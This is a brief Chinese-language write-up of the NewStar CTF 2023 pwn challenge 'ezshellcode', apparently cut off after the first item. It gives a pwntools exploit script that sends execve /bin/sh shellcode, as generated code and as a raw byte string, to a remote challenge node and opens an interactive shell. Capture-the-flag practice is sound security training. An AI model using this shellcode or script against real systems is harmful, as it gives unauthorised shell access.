Newstar CTF 2023 pwn
1.ezshellcode 直接sendline(shellcode)即可 exp: from pwn import * p = remote("node4.buuoj.cn",29374) #p = process('/home/miyu/Desktop/ezshellcode') context(log_level = 'debug', arch = 'amd64', os = 'linux') shellcode=asm(shellcraft.sh()) #shellcode = b'\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05' payload = shellcode p.sendlineafter('Show me your magic\n',payload) p.interactive() pwntools生成的shellcode和\x31\xf6\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x56\x53\x54\x5f\x6a\x3b\x58\x31\xd2\x0f\x05都能过 ...